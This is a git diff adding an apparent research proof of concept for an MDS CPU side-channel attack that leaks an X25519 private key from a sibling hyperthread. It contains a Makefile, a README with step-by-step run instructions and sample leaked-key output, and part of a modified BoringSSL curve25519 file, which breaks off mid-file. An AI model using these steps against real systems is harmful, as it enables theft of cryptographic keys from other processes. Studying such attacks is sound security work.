diff --git a/pocs/cpus/mds-x25519/Makefile b/pocs/cpus/mds-x25519/Makefile new file mode 100644 index 00000000..91ec33f7 --- /dev/null +++ b/pocs/cpus/mds-x25519/Makefile @@ -0,0 +1,21 @@ +.PHONY: all clean + +all: leak_evict_x25519 leak_intermediate_x25519 leak_multiprocess x25519_victim + +CFLAGS=-O3 -mrtm -static -masm=intel + +boringssl/crypto/curve25519/fake_x25519.c: fake_x25519.c + git clone https://boringssl.googlesource.com/boringssl || true + cp fake_x25519.c boringssl/crypto/curve25519/fake_x25519.c + +leak_intermediate_x25519: boringssl/crypto/curve25519/fake_x25519.c leak_intermediate_x25519.c + cc $^ -o $@ $(CFLAGS) -Iboringssl/include + +leak_multiprocess: boringssl/crypto/curve25519/fake_x25519.c leak_multiprocess.c + cc $^ -o $@ $(CFLAGS) -Iboringssl/include + +x25519_victim: boringssl/crypto/curve25519/curve25519.c x25519_victim.c + cc $^ -o $@ $(CFLAGS) -Iboringssl/include -lssl -lcrypto + +clean: + - rm -rf leak_evict_x25519 leak_intermediate_x25519 leak_multiprocess x25519_victim boringssl diff --git a/pocs/cpus/mds-x25519/README.md b/pocs/cpus/mds-x25519/README.md new file mode 100644 index 00000000..67da441e --- /dev/null +++ b/pocs/cpus/mds-x25519/README.md @@ -0,0 +1,57 @@ + + +# MDS exploits + +## How to run + +The RIDL exploit, `leak_evict_x25519.c` unfortunately targets an internal +server, so you won't be able to reproduce our results. + +MLPDS exploit, although it targets the same server, does not depend on its +memory layout etc. - so we prepared a custom victim that just calls `X25519` +function in an infinite loop. To run, first compile the code: + +``` +make +``` + +This will also clone the boringssl repository (it's a dependency). +Check how many cores your CPU has: + +``` +nproc --all +``` + +For my workstation, it prints `12`, which means I have 6 cores (with +hyperthreading doubling the number). Run the victim: + +``` +taskset -a -c 2 ./x25519_victim +``` + +In another terminal, run the exploit: + +``` +taskset -a -c 8 ./leak_intermediate_x25519 <<< "1 2 3 4 5 6 7 8 9 a b c d e f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20" +``` + +The `1 2 3...` string is the client private key used in X25519. +Note that I pin the two processes to cores 2 and 8, which are 6 apart - meaning +they occupy sibling threads. You should see some intermediate output pretty quickly, and +after 255 iterations (say 10 minutes, depending on CPU), the process will finish. +The last line will show the leaked secret: + +``` +Secret: 70 72 69 76 74 65 73 74 31 32 33 34 35 36 37 38 73 6f 6d 65 6d 6f 72 65 62 69 74 73 41 42 43 44 +``` + +If you decode the hexadecimal, it says `privtest12345678somemorebitsABCD`, which +was the private key hardcoded in `x25519_victim.c`. + +If you wait several minutes and always get only `--- diff_abs 0 (0 vs. 0, total 0)` +result, something's wrong. You should check if hyperthreading is enabled, and +that your CPU supports TSX and it's not disabled. + +If you want to try the multithreaded exploit, `leak_multiprocess.c`, before +compiling change the `#define CPU_NUM 6` to the actual number of cores in your +CPU. Other than that, the usage is the same. diff --git a/pocs/cpus/mds-x25519/fake_x25519.c b/pocs/cpus/mds-x25519/fake_x25519.c new file mode 100644 index 00000000..71f4deda --- /dev/null +++ b/pocs/cpus/mds-x25519/fake_x25519.c @@ -0,0 +1,1850 @@ +/* Copyright (c) 2020, Google Inc. + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY + * SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION + * OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN + * CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ +// Some of this code is taken from the ref10 version of Ed25519 in SUPERCOP +// 20141124 (http://bench.cr.yp.to/supercop.html). That code is released as +// public domain. Other parts have been replaced to call into code generated by +// Fiat (https://github.com/mit-plv/fiat-crypto) in //third_party/fiat. +// +// The field functions are shared by Ed25519 and X25519 where possible. +#include +#include +#include +#include +#include +#include +#include +#include "internal.h" +#include "../internal.h" +// Various pre-computed constants. +#include "./curve25519_tables.h" +#if defined(OPENSSL_NO_ASM) +#define FIAT_25519_NO_ASM +#endif +#if defined(BORINGSSL_CURVE25519_64BIT) +#include "../../third_party/fiat/curve25519_64.h" +#else +#include "../../third_party/fiat/curve25519_32.h" +#endif // BORINGSSL_CURVE25519_64BIT +// Low-level intrinsic operations +static uint64_t load_3(const uint8_t *in) { + uint64_t result; + result = (uint64_t)in[0]; + result |= ((uint64_t)in[1]) << 8; + result |= ((uint64_t)in[2]) << 16; + return result; +} +static uint64_t load_4(const uint8_t *in) { + uint64_t result; + result = (uint64_t)in[0]; + result |= ((uint64_t)in[1]) << 8; + result |= ((uint64_t)in[2]) << 16; + result |= ((uint64_t)in[3]) << 24; + return result; +} +// Field operations. +#if defined(BORINGSSL_CURVE25519_64BIT) +typedef uint64_t fe_limb_t; +#define FE_NUM_LIMBS 5 +// assert_fe asserts that |f| satisfies bounds: +// +// [[0x0 ~> 0x8cccccccccccc], +// [0x0 ~> 0x8cccccccccccc], +// [0x0 ~> 0x8cccccccccccc], +// [0x0 ~> 0x8cccccccccccc], +// [0x0 ~> 0x8cccccccccccc]] +// +// See comments in curve25519_64.h for which functions use these bounds for +// inputs or outputs. +#define assert_fe(f) \ + do { \ + for (unsigned _assert_fe_i = 0; _assert_fe_i < 5; _assert_fe_i++) { \ + assert(f[_assert_fe_i] <= UINT64_C(0x8cccccccccccc)); \ + } \ + } while (0) +// assert_fe_loose asserts that |f| satisfies bounds: +// +// [[0x0 ~> 0x1a666666666664], +// [0x0 ~> 0x1a666666666664], +// [0x0 ~> 0x1a666666666664], +// [0x0 ~> 0x1a666666666664], +// [0x0 ~> 0x1a666666666664]] +// +// See comments in curve25519_64.h for which functions use these bounds for +// inputs or outputs. +#define assert_fe_loose(f) \ + do { \ + for (unsigned _assert_fe_i = 0; _assert_fe_i < 5; _assert_fe_i++) { \ + assert(f[_assert_fe_i] <= UINT64_C(0x1a666666666664)); \ + } \ + } while (0) +#else +typedef uint32_t fe_limb_t; +#define FE_NUM_LIMBS 10 +// assert_fe asserts that |f| satisfies bounds: +// +// [[0x0 ~> 0x4666666], [0x0 ~> 0x2333333], +// [0x0 ~> 0x4666666], [0x0 ~> 0x2333333], +// [0x0 ~> 0x4666666], [0x0 ~> 0x2333333], +// [0x0 ~> 0x4666666], [0x0 ~> 0x2333333], +// [0x0 ~> 0x4666666], [0x0 ~> 0x2333333]] +// +// See comments in curve25519_32.h for which functions use these bounds for +// inputs or outputs. +#define assert_fe(f) \ + do { \ + for (unsigned _assert_fe_i = 0; _assert_fe_i < 10; _assert_fe_i++) { \ + assert(f[_assert_fe_i] <= \ + ((_assert_fe_i & 1) ? 0x2333333u : 0x4666666u)); \ + } \ + } while (0) +// assert_fe_loose asserts that |f| satisfies bounds: +// +// [[0x0 ~> 0xd333332], [0x0 ~> 0x6999999], +// [0x0 ~> 0xd333332], [0x0 ~> 0x6999999], +// [0x0 ~> 0xd333332], [0x0 ~> 0x6999999], +// [0x0 ~> 0xd333332], [0x0 ~> 0x6999999], +// [0x0 ~> 0xd333332], [0x0 ~> 0x6999999]] +// +// See comments in curve25519_32.h for which functions use these bounds for +// inputs or outputs. +#define assert_fe_loose(f) \ + do { \ + for (unsigned _assert_fe_i = 0; _assert_fe_i < 10; _assert_fe_i++) { \ + assert(f[_assert_fe_i] <= \ + ((_assert_fe_i & 1) ? 0x6999999u : 0xd333332u)); \ + } \ + } while (0) +#endif // BORINGSSL_CURVE25519_64BIT +//OPENSSL_STATIC_ASSERT(sizeof(fe) == sizeof(fe_limb_t) * FE_NUM_LIMBS, +// "fe_limb_t[FE_NUM_LIMBS] is inconsistent with fe"); +#define OPENSSL_STATIC_ASSERT(...) +static void fe_frombytes_strict(fe *h, const uint8_t s[32]) { + // |fiat_25519_from_bytes| requires the top-most bit be clear. + assert((s[31] & 0x80) == 0); + fiat_25519_from_bytes(h->v, s); + assert_fe(h->v); +} +static void fe_frombytes(fe *h, const uint8_t s[32]) { + uint8_t s_copy[32]; + OPENSSL_memcpy(s_copy, s, 32); + s_copy[31] &= 0x7f; + fe_frombytes_strict(h, s_copy); +} +static void fe_tobytes(uint8_t s[32], const fe *f) { + assert_fe(f->v); + fiat_25519_to_bytes(s, f->v); +} +// h = 0 +static void fe_0(fe *h) { + OPENSSL_memset(h, 0, sizeof(fe)); +} +static void fe_loose_0(fe_loose *h) { + OPENSSL_memset(h, 0, sizeof(fe_loose)); +} +// h = 1 +static void fe_1(fe *h) { + OPENSSL_memset(h, 0, sizeof(fe)); + h->v[0] = 1; +} +static void fe_loose_1(fe_loose *h) { + OPENSSL_memset(h, 0, sizeof(fe_loose)); + h->v[0] = 1; +} +// h = f + g +// Can overlap h with f or g. +static void fe_add(fe_loose *h, const fe *f, const fe *g) { + assert_fe(f->v); + assert_fe(g->v); + fiat_25519_add(h->v, f->v, g->v); + assert_fe_loose(h->v); +} +// h = f - g +// Can overlap h with f or g. +static void fe_sub(fe_loose *h, const fe *f, const fe *g) { + assert_fe(f->v); + assert_fe(g->v); + fiat_25519_sub(h->v, f->v, g->v); + assert_fe_loose(h->v); +} +static void fe_carry(fe *h, const fe_loose* f) { + assert_fe_loose(f->v); + fiat_25519_carry(h->v, f->v); + assert_fe(h->v); +} +static void fe_mul_impl(fe_limb_t out[FE_NUM_LIMBS], + const fe_limb_t in1[FE_NUM_LIMBS], + const fe_limb_t in2[FE_NUM_LIMBS]) { + assert_fe_loose(in1); + assert_fe_loose(in2); + fiat_25519_carry_mul(out, in1, in2); + assert_fe(out); +} +static void fe_mul_ltt(fe_loose *h, const fe *f, const fe *g) { + fe_mul_impl(h->v, f->v, g->v); +} +static void fe_mul_llt(fe_loose *h, const fe_loose *f, const fe *g) { + fe_mul_impl(h->v, f->v, g->v); +} +static void fe_mul_ttt(fe *h, const fe *f, const fe *g) { + fe_mul_impl(h->v, f->v, g->v); +} +static void fe_mul_tlt(fe *h, const fe_loose *f, const fe *g) { + fe_mul_impl(h->v, f->v, g->v); +} +static void fe_mul_ttl(fe *h, const fe *f, const fe_loose *g) { + fe_mul_impl(h->v, f->v, g->v); +} +static void fe_mul_tll(fe *h, const fe_loose *f, const fe_loose *g) { + fe_mul_impl(h->v, f->v, g->v); +} +static void fe_sq_tl(fe *h, const fe_loose *f) { + assert_fe_loose(f->v); + fiat_25519_carry_square(h->v, f->v); + assert_fe(h->v); +} +static void fe_sq_tt(fe *h, const fe *f) { + assert_fe_loose(f->v); + fiat_25519_carry_square(h->v, f->v); + assert_fe(h->v); +} +// Replace (f,g) with (g,f) if b == 1; +// replace (f,g) with (f,g) if b == 0. +// +// Preconditions: b in {0,1}. +static void fe_cswap(fe *f, fe *g, fe_limb_t b) { + b = 0-b; + for (unsigned i = 0; i < FE_NUM_LIMBS; i++) { + fe_limb_t x = f->v[i] ^ g->v[i]; + x &= b; + f->v[i] ^= x; + g->v[i] ^= x; + } +} +static void fe_mul121666(fe *h, const fe_loose *f) { + assert_fe_loose(f->v); + fiat_25519_carry_scmul_121666(h->v, f->v); + assert_fe(h->v); +} +// h = -f +static void fe_neg(fe_loose *h, const fe *f) { + assert_fe(f->v); + fiat_25519_opp(h->v, f->v); + assert_fe_loose(h->v); +} +// Replace (f,g) with (g,g) if b == 1; +// replace (f,g) with (f,g) if b == 0. +// +// Preconditions: b in {0,1}. +static void fe_cmov(fe_loose *f, const fe_loose *g, fe_limb_t b) { + // Silence an unused function warning. |fiat_25519_selectznz| isn't quite the + // calling convention the rest of this code wants, so implement it by hand. + // + // TODO(davidben): Switch to fiat's calling convention, or ask fiat to emit a + // different one. + (void)fiat_25519_selectznz; + b = 0-b; + for (unsigned i = 0; i < FE_NUM_LIMBS; i++) { + fe_limb_t x = f->v[i] ^ g->v[i]; + x &= b; + f->v[i] ^= x; + } +} +// h = f +static void fe_copy(fe *h, const fe *f) { + OPENSSL_memmove(h, f, sizeof(fe)); +} +static void fe_copy_lt(fe_loose *h, const fe *f) { + OPENSSL_STATIC_ASSERT(sizeof(fe_loose) == sizeof(fe), + "fe and fe_loose mismatch"); + OPENSSL_memmove(h, f, sizeof(fe)); +} +#if !defined(OPENSSL_SMALL) +static void fe_copy_ll(fe_loose *h, const fe_loose *f) { + OPENSSL_memmove(h, f, sizeof(fe_loose)); +} +#endif // !defined(OPENSSL_SMALL) +static void fe_loose_invert(fe *out, const fe_loose *z) { + fe t0; + fe t1; + fe t2; + fe t3; + int i; + fe_sq_tl(&t0, z); + fe_sq_tt(&t1, &t0); + for (i = 1; i < 2; ++i) { + fe_sq_tt(&t1, &t1); + } + fe_mul_tlt(&t1, z, &t1); + fe_mul_ttt(&t0, &t0, &t1); + fe_sq_tt(&t2, &t0); + fe_mul_ttt(&t1, &t1, &t2); + fe_sq_tt(&t2, &t1); + for (i = 1; i < 5; ++i) { + fe_sq_tt(&t2, &t2); + } + fe_mul_ttt(&t1, &t2, &t1); + fe_sq_tt(&t2, &t1); + for (i = 1; i < 10; ++i) { + fe_sq_tt(&t2, &t2); + } + fe_mul_ttt(&t2, &t2, &t1); + fe_sq_tt(&t3, &t2); + for (i = 1; i < 20; ++i) { + fe_sq_tt(&t3, &t3); + } + fe_mul_ttt(&t2, &t3, &t2); + fe_sq_tt(&t2, &t2); + for (i = 1; i < 10; ++i) { + fe_sq_tt(&t2, &t2); + } + fe_mul_ttt(&t1, &t2, &t1); + fe_sq_tt(&t2, &t1); + for (i = 1; i < 50; ++i) { + fe_sq_tt(&t2, &t2); + } + fe_mul_ttt(&t2, &t2, &t1); + fe_sq_tt(&t3, &t2); + for (i = 1; i < 100; ++i) { + fe_sq_tt(&t3, &t3); + } + fe_mul_ttt(&t2, &t3, &t2); + fe_sq_tt(&t2, &t2); + for (i = 1; i < 50; ++i) { + fe_sq_tt(&t2, &t2); + } + fe_mul_ttt(&t1, &t2, &t1); + fe_sq_tt(&t1, &t1); + for (i = 1; i < 5; ++i) { + fe_sq_tt(&t1, &t1); + } + fe_mul_ttt(out, &t1, &t0); +} +static void fe_invert(fe *out, const fe *z) { + fe_loose l; + fe_copy_lt(&l, z); + fe_loose_invert(out, &l); +} +// return 0 if f == 0 +// return 1 if f != 0 +static int fe_isnonzero(const fe_loose *f) { + fe tight; + fe_carry(&tight, f); + uint8_t s[32]; + fe_tobytes(s, &tight); + static const uint8_t zero[32] = {0}; + return CRYPTO_memcmp(s, zero, sizeof(zero)) != 0; +} +// return 1 if f is in {1,3,5,...,q-2} +// return 0 if f is in {0,2,4,...,q-1} +static int fe_isnegative(const fe *f) { + uint8_t s[32]; + fe_tobytes(s, f); + return s[0] & 1; +} +static void fe_sq2_tt(fe *h, const fe *f) { + // h = f^2 + fe_sq_tt(h, f); + // h = h + h + fe_loose tmp; + fe_add(&tmp, h, h); + fe_carry(h, &tmp); +} +static void fe_pow22523(fe *out, const fe *z) { + fe t0; + fe t1; + fe t2; + int i; + fe_sq_tt(&t0, z); + fe_sq_tt(&t1, &t0); + for (i = 1; i < 2; ++i) { + fe_sq_tt(&t1, &t1); + } + fe_mul_ttt(&t1, z, &t1); + fe_mul_ttt(&t0, &t0, &t1); + fe_sq_tt(&t0, &t0); + fe_mul_ttt(&t0, &t1, &t0); + fe_sq_tt(&t1, &t0); + for (i = 1; i < 5; ++i) { + fe_sq_tt(&t1, &t1); + } + fe_mul_ttt(&t0, &t1, &t0); + fe_sq_tt(&t1, &t0); + for (i = 1; i < 10; ++i) { + fe_sq_tt(&t1, &t1); + } + fe_mul_ttt(&t1, &t1, &t0); + fe_sq_tt(&t2, &t1); + for (i = 1; i < 20; ++i) { + fe_sq_tt(&t2, &t2); + } + fe_mul_ttt(&t1, &t2, &t1); + fe_sq_tt(&t1, &t1); + for (i = 1; i < 10; ++i) { + fe_sq_tt(&t1, &t1); + } + fe_mul_ttt(&t0, &t1, &t0); + fe_sq_tt(&t1, &t0); + for (i = 1; i < 50; ++i) { + fe_sq_tt(&t1, &t1); + } + fe_mul_ttt(&t1, &t1, &t0); + fe_sq_tt(&t2, &t1); + for (i = 1; i < 100; ++i) { + fe_sq_tt(&t2, &t2); + } + fe_mul_ttt(&t1, &t2, &t1); + fe_sq_tt(&t1, &t1); + for (i = 1; i < 50; ++i) { + fe_sq_tt(&t1, &t1); + } + fe_mul_ttt(&t0, &t1, &t0); + fe_sq_tt(&t0, &t0); + for (i = 1; i < 2; ++i) { + fe_sq_tt(&t0, &t0); + } + fe_mul_ttt(out, &t0, z); +} +// Group operations. +void x25519_ge_tobytes(uint8_t s[32], const ge_p2 *h) { + fe recip; + fe x; + fe y; + fe_invert(&recip, &h->Z); + fe_mul_ttt(&x, &h->X, &recip); + fe_mul_ttt(&y, &h->Y, &recip); + fe_tobytes(s, &y); + s[31] ^= fe_isnegative(&x) << 7; +} +static void ge_p3_tobytes(uint8_t s[32], const ge_p3 *h) { + fe recip; + fe x; + fe y; + fe_invert(&recip, &h->Z); + fe_mul_ttt(&x, &h->X, &recip); + fe_mul_ttt(&y, &h->Y, &recip); + fe_tobytes(s, &y); + s[31] ^= fe_isnegative(&x) << 7; +} +static void ge_p2_0(ge_p2 *h) { + fe_0(&h->X); + fe_1(&h->Y); + fe_1(&h->Z); +} +static void ge_p3_0(ge_p3 *h) { + fe_0(&h->X); + fe_1(&h->Y); + fe_1(&h->Z); + fe_0(&h->T); +} +static void ge_cached_0(ge_cached *h) { + fe_loose_1(&h->YplusX); + fe_loose_1(&h->YminusX); + fe_loose_1(&h->Z); + fe_loose_0(&h->T2d); +} +static void ge_precomp_0(ge_precomp *h) { + fe_loose_1(&h->yplusx); + fe_loose_1(&h->yminusx); + fe_loose_0(&h->xy2d); +} +// r = p +static void ge_p3_to_p2(ge_p2 *r, const ge_p3 *p) { + fe_copy(&r->X, &p->X); + fe_copy(&r->Y, &p->Y); + fe_copy(&r->Z, &p->Z); +} +// r = p +void x25519_ge_p3_to_cached(ge_cached *r, const ge_p3 *p) { + fe_add(&r->YplusX, &p->Y, &p->X); + fe_sub(&r->YminusX, &p->Y, &p->X); + fe_copy_lt(&r->Z, &p->Z); + fe_mul_ltt(&r->T2d, &p->T, &d2); +} +// r = p +void x25519_ge_p1p1_to_p2(ge_p2 *r, const ge_p1p1 *p) { + fe_mul_tll(&r->X, &p->X, &p->T); + fe_mul_tll(&r->Y, &p->Y, &p->Z); + fe_mul_tll(&r->Z, &p->Z, &p->T); +} +// r = p +void x25519_ge_p1p1_to_p3(ge_p3 *r, const ge_p1p1 *p) { + fe_mul_tll(&r->X, &p->X, &p->T); + fe_mul_tll(&r->Y, &p->Y, &p->Z); + fe_mul_tll(&r->Z, &p->Z, &p->T); + fe_mul_tll(&r->T, &p->X, &p->Y); +} +// r = p +static void ge_p1p1_to_cached(ge_cached *r, const ge_p1p1 *p) { + ge_p3 t; + x25519_ge_p1p1_to_p3(&t, p); + x25519_ge_p3_to_cached(r, &t); +} +// r = 2 * p +static void ge_p2_dbl(ge_p1p1 *r, const ge_p2 *p) { + fe trX, trZ, trT; + fe t0; + fe_sq_tt(&trX, &p->X); + fe_sq_tt(&trZ, &p->Y); + fe_sq2_tt(&trT, &p->Z); + fe_add(&r->Y, &p->X, &p->Y); + fe_sq_tl(&t0, &r->Y); + fe_add(&r->Y, &trZ, &trX); + fe_sub(&r->Z, &trZ, &trX); + fe_carry(&trZ, &r->Y); + fe_sub(&r->X, &t0, &trZ); + fe_carry(&trZ, &r->Z); + fe_sub(&r->T, &trT, &trZ); +} +// r = 2 * p +static void ge_p3_dbl(ge_p1p1 *r, const ge_p3 *p) { + ge_p2 q; + ge_p3_to_p2(&q, p); + ge_p2_dbl(r, &q); +} +// r = p + q +static void ge_madd(ge_p1p1 *r, const ge_p3 *p, const ge_precomp *q) { + fe trY, trZ, trT; + fe_add(&r->X, &p->Y, &p->X); + fe_sub(&r->Y, &p->Y, &p->X); + fe_mul_tll(&trZ, &r->X, &q->yplusx); + fe_mul_tll(&trY, &r->Y, &q->yminusx); + fe_mul_tlt(&trT, &q->xy2d, &p->T); + fe_add(&r->T, &p->Z, &p->Z); + fe_sub(&r->X, &trZ, &trY); + fe_add(&r->Y, &trZ, &trY); + fe_carry(&trZ, &r->T); + fe_add(&r->Z, &trZ, &trT); + fe_sub(&r->T, &trZ, &trT); +} +// r = p - q +static void ge_msub(ge_p1p1 *r, const ge_p3 *p, const ge_precomp *q) { + fe trY, trZ, trT; + fe_add(&r->X, &p->Y, &p->X); + fe_sub(&r->Y, &p->Y, &p->X); + fe_mul_tll(&trZ, &r->X, &q->yminusx); + fe_mul_tll(&trY, &r->Y, &q->yplusx); + fe_mul_tlt(&trT, &q->xy2d, &p->T); + fe_add(&r->T, &p->Z, &p->Z); + fe_sub(&r->X, &trZ, &trY); + fe_add(&r->Y, &trZ, &trY); + fe_carry(&trZ, &r->T); + fe_sub(&r->Z, &trZ, &trT); + fe_add(&r->T, &trZ, &trT); +} +// r = p + q +void x25519_ge_add(ge_p1p1 *r, const ge_p3 *p, const ge_cached *q) { + fe trX, trY, trZ, trT; + fe_add(&r->X, &p->Y, &p->X); + fe_sub(&r->Y, &p->Y, &p->X); + fe_mul_tll(&trZ, &r->X, &q->YplusX); + fe_mul_tll(&trY, &r->Y, &q->YminusX); + fe_mul_tlt(&trT, &q->T2d, &p->T); + fe_mul_ttl(&trX, &p->Z, &q->Z); + fe_add(&r->T, &trX, &trX); + fe_sub(&r->X, &trZ, &trY); + fe_add(&r->Y, &trZ, &trY); + fe_carry(&trZ, &r->T); + fe_add(&r->Z, &trZ, &trT); + fe_sub(&r->T, &trZ, &trT); +} +// r = p - q +void x25519_ge_sub(ge_p1p1 *r, const ge_p3 *p, const ge_cached *q) { + fe trX, trY, trZ, trT; + fe_add(&r->X, &p->Y, &p->X); + fe_sub(&r->Y, &p->Y, &p->X); + fe_mul_tll(&trZ, &r->X, &q->YminusX); + fe_mul_tll(&trY, &r->Y, &q->YplusX); + fe_mul_tlt(&trT, &q->T2d, &p->T); + fe_mul_ttl(&trX, &p->Z, &q->Z); + fe_add(&r->T, &trX, &trX); + fe_sub(&r->X, &trZ, &trY); + fe_add(&r->Y, &trZ, &trY); + fe_carry(&trZ, &r->T); + fe_sub(&r->Z, &trZ, &trT); + fe_add(&r->T, &trZ, &trT); +} +static uint8_t equal(signed char b, signed char c) { + uint8_t ub = b; + uint8_t uc = c; + uint8_t x = ub ^ uc; // 0: yes; 1..255: no + uint32_t y = x; // 0: yes; 1..255: no + y -= 1; // 4294967295: yes; 0..254: no + y >>= 31; // 1: yes; 0: no + return y; +} +static void cmov(ge_precomp *t, const ge_precomp *u, uint8_t b) { + fe_cmov(&t->yplusx, &u->yplusx, b); + fe_cmov(&t->yminusx, &u->yminusx, b); + fe_cmov(&t->xy2d, &u->xy2d, b); +} +void x25519_ge_scalarmult_small_precomp( + ge_p3 *h, const uint8_t a[32], const uint8_t precomp_table[15 * 2 * 32]) { + // precomp_table is first expanded into matching |ge_precomp| + // elements. + ge_precomp multiples[15]; + unsigned i; + for (i = 0; i < 15; i++) { + // The precomputed table is assumed to already clear the top bit, so + // |fe_frombytes_strict| may be used directly. + const uint8_t *bytes = &precomp_table[i*(2 * 32)]; + fe x, y; + fe_frombytes_strict(&x, bytes); + fe_frombytes_strict(&y, bytes + 32); + ge_precomp *out = &multiples[i]; + fe_add(&out->yplusx, &y, &x); + fe_sub(&out->yminusx, &y, &x); + fe_mul_ltt(&out->xy2d, &x, &y); + fe_mul_llt(&out->xy2d, &out->xy2d, &d2); + } + // See the comment above |k25519SmallPrecomp| about the structure of the + // precomputed elements. This loop does 64 additions and 64 doublings to + // calculate the result. + ge_p3_0(h); + for (i = 63; i < 64; i--) { + unsigned j; + signed char index = 0; + for (j = 0; j < 4; j++) { + const uint8_t bit = 1 & (a[(8 * j) + (i / 8)] >> (i & 7)); + index |= (bit << j); + } + ge_precomp e; + ge_precomp_0(&e); + for (j = 1; j < 16; j++) { + cmov(&e, &multiples[j-1], equal(index, j)); + } + ge_cached cached; + ge_p1p1 r; + x25519_ge_p3_to_cached(&cached, h); + x25519_ge_add(&r, h, &cached); + x25519_ge_p1p1_to_p3(h, &r); + ge_madd(&r, h, &e); + x25519_ge_p1p1_to_p3(h, &r); + } +} +#if defined(OPENSSL_SMALL) +void x25519_ge_scalarmult_base(ge_p3 *h, const uint8_t a[32]) { + x25519_ge_scalarmult_small_precomp(h, a, k25519SmallPrecomp); +} +#else +static uint8_t negative(signed char b) { + uint32_t x = b; + x >>= 31; // 1: yes; 0: no + return x; +} +static void table_select(ge_precomp *t, int pos, signed char b) { + ge_precomp minust; + uint8_t bnegative = negative(b); + uint8_t babs = b - ((uint8_t)((-bnegative) & b) << 1); + ge_precomp_0(t); + cmov(t, &k25519Precomp[pos][0], equal(babs, 1)); + cmov(t, &k25519Precomp[pos][1], equal(babs, 2)); + cmov(t, &k25519Precomp[pos][2], equal(babs, 3)); + cmov(t, &k25519Precomp[pos][3], equal(babs, 4)); + cmov(t, &k25519Precomp[pos][4], equal(babs, 5)); + cmov(t, &k25519Precomp[pos][5], equal(babs, 6)); + cmov(t, &k25519Precomp[pos][6], equal(babs, 7)); + cmov(t, &k25519Precomp[pos][7], equal(babs, 8)); + fe_copy_ll(&minust.yplusx, &t->yminusx); + fe_copy_ll(&minust.yminusx, &t->yplusx); + // NOTE: the input table is canonical, but types don't encode it + fe tmp; + fe_carry(&tmp, &t->xy2d); + fe_neg(&minust.xy2d, &tmp); + cmov(t, &minust, bnegative); +} +// h = a * B +// where a = a[0]+256*a[1]+...+256^31 a[31] +// B is the Ed25519 base point (x,4/5) with x positive. +// +// Preconditions: +// a[31] <= 127 +void x25519_ge_scalarmult_base(ge_p3 *h, const uint8_t a[32]) { + signed char e[64]; + signed char carry; + ge_p1p1 r; + ge_p2 s; + ge_precomp t; + int i; + for (i = 0; i < 32; ++i) { + e[2 * i + 0] = (a[i] >> 0) & 15; + e[2 * i + 1] = (a[i] >> 4) & 15; + } + // each e[i] is between 0 and 15 + // e[63] is between 0 and 7 + carry = 0; + for (i = 0; i < 63; ++i) { + e[i] += carry; + carry = e[i] + 8; + carry >>= 4; + e[i] -= carry << 4; + } + e[63] += carry; + // each e[i] is between -8 and 8 + ge_p3_0(h); + for (i = 1; i < 64; i += 2) { + table_select(&t, i / 2, e[i]); + ge_madd(&r, h, &t); + x25519_ge_p1p1_to_p3(h, &r); + } + ge_p3_dbl(&r, h); + x25519_ge_p1p1_to_p2(&s, &r); + ge_p2_dbl(&r, &s); + x25519_ge_p1p1_to_p2(&s, &r); + ge_p2_dbl(&r, &s); + x25519_ge_p1p1_to_p2(&s, &r); + ge_p2_dbl(&r, &s); + x25519_ge_p1p1_to_p3(h, &r); + for (i = 0; i < 64; i += 2) { + table_select(&t, i / 2, e[i]); + ge_madd(&r, h, &t); + x25519_ge_p1p1_to_p3(h, &r); + } +} +#endif +static void cmov_cached(ge_cached *t, ge_cached *u, uint8_t b) { + fe_cmov(&t->YplusX, &u->YplusX, b); + fe_cmov(&t->YminusX, &u->YminusX, b); + fe_cmov(&t->Z, &u->Z, b); + fe_cmov(&t->T2d, &u->T2d, b); +} +// r = scalar * A. +// where a = a[0]+256*a[1]+...+256^31 a[31]. +void x25519_ge_scalarmult(ge_p2 *r, const uint8_t *scalar, const ge_p3 *A) { + ge_p2 Ai_p2[8]; + ge_cached Ai[16]; + ge_p1p1 t; + ge_cached_0(&Ai[0]); + x25519_ge_p3_to_cached(&Ai[1], A); + ge_p3_to_p2(&Ai_p2[1], A); + unsigned i; + for (i = 2; i < 16; i += 2) { + ge_p2_dbl(&t, &Ai_p2[i / 2]); + ge_p1p1_to_cached(&Ai[i], &t); + if (i < 8) { + x25519_ge_p1p1_to_p2(&Ai_p2[i], &t); + } + x25519_ge_add(&t, A, &Ai[i]); + ge_p1p1_to_cached(&Ai[i + 1], &t); + if (i < 7) { + x25519_ge_p1p1_to_p2(&Ai_p2[i + 1], &t); + } + } + ge_p2_0(r); + ge_p3 u; + for (i = 0; i < 256; i += 4) { + ge_p2_dbl(&t, r); + x25519_ge_p1p1_to_p2(r, &t); + ge_p2_dbl(&t, r); + x25519_ge_p1p1_to_p2(r, &t); + ge_p2_dbl(&t, r); + x25519_ge_p1p1_to_p2(r, &t); + ge_p2_dbl(&t, r); + x25519_ge_p1p1_to_p3(&u, &t); + uint8_t index = scalar[31 - i/8]; + index >>= 4 - (i & 4); + index &= 0xf; + unsigned j; + ge_cached selected; + ge_cached_0(&selected); + for (j = 0; j < 16; j++) { + cmov_cached(&selected, &Ai[j], equal(j, index)); + } + x25519_ge_add(&t, &u, &selected); + x25519_ge_p1p1_to_p2(r, &t); + } +} +static void slide(signed char *r, const uint8_t *a) { + int i; + int b; + int k; + for (i = 0; i < 256; ++i) { + r[i] = 1 & (a[i >> 3] >> (i & 7)); + } + for (i = 0; i < 256; ++i) { + if (r[i]) { + for (b = 1; b <= 6 && i + b < 256; ++b) { + if (r[i + b]) { + if (r[i] + (r[i + b] << b) <= 15) { + r[i] += r[i + b] << b; + r[i + b] = 0; + } else if (r[i] - (r[i + b] << b) >= -15) { + r[i] -= r[i + b] << b; + for (k = i + b; k < 256; ++k) { + if (!r[k]) { + r[k] = 1; + break; + } + r[k] = 0; + } + } else { + break; + } + } + } + } + } +} +// r = a * A + b * B +// where a = 